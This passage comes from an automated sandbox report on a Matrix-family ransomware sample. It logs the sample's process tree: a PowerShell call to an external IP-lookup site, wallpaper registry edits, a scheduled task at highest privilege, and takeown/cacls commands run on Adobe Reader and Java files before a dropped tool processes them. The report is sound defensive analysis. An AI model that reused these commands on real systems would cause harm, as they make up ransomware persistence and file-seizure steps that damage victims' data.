memory of 1760 3048 cmd.exe 51 PID 3048 wrote to memory of 1760 3048 cmd.exe 51 PID 3048 wrote to memory of 1760 3048 cmd.exe 51 PID 3048 wrote to memory of 3952 3048 cmd.exe 52 PID 3048 wrote to memory of 3952 3048 cmd.exe 52 PID 3048 wrote to memory of 3952 3048 cmd.exe 52 PID 3048 wrote to memory of 3952 3048 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe"2⤵PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe" -n2⤵
- Executes dropped EXE
PID:2344
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Wo6r9M7V.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IhklkhQE.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IhklkhQE.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:2292
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:2848
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kixASbnx.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kixASbnx.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:3376
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1792
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:2236
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:1760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:852 -
C:\Users\Admin\AppData\Local\Temp\sOCkujKF64.exesOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:3252 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:2604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:3624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:2292 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:3660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:3316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1704 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:2356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Loads dropped DLL
PID:1112 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:3172 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:2080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:3720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:3024 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:2060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3800 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵
- Loads dropped DLL
PID:4232 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:4260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:4272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵
- Loads dropped DLL
PID:4284 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵
- Executes dropped EXE
PID:4292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:4352 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:4392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵
- Loads dropped DLL
PID:4488 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:4516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:4532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadCAD.otf" -nobanner3⤵
- Loads dropped DLL
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MyriadCAD.otf" -nobanner4⤵
- Executes dropped EXE
PID:4548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵
- Loads dropped DLL
PID:4600 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:4628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:4640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "create_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "create_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:4656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵
- Loads dropped DLL
PID:4724 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:4748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:4768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "info.gif" -nobanner3⤵
- Loads dropped DLL
PID:4780 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "info.gif" -nobanner4⤵
- Executes dropped EXE
PID:4788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵
- Loads dropped DLL
PID:4836 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:4864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵PID:4880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵
- Loads dropped DLL
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵
- Executes dropped EXE
PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵
- Loads dropped DLL
PID:4960 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:4984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "trash.gif" -nobanner3⤵
- Loads dropped DLL
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "trash.gif" -nobanner4⤵
- Executes dropped EXE
PID:5012
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵
- Modifies file permissions
PID:4996
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵
- Loads dropped DLL
PID:5076 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:5104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:5116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵
- Loads dropped DLL
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵
- Executes dropped EXE
PID:3276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵
- Loads dropped DLL
PID:3044 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:3996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵
- Loads dropped DLL
PID:3412 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:3664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵
- Loads dropped DLL
PID:2828 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵
- Executes dropped EXE
PID:2372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵
- Loads dropped DLL
PID:3724 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:3688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:2248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can.hyp" -nobanner3⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "can.hyp" -nobanner4⤵
- Executes dropped EXE
PID:3368
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵
- Loads dropped DLL
PID:2692 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵
- Modifies file permissions
PID:4056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa37.hyp" -nobanner3⤵
- Loads dropped DLL
PID:3992 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "usa37.hyp" -nobanner4⤵
- Executes dropped EXE
PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵
- Loads dropped DLL
PID:1960 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:2784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵
- Modifies file permissions
PID:776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ICELAND.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ICELAND.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵
- Loads dropped DLL
PID:3852 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:3732
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵
- Modifies file permissions
PID:2624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1254.TXT" -nobanner3⤵
- Loads dropped DLL
PID:3816 -
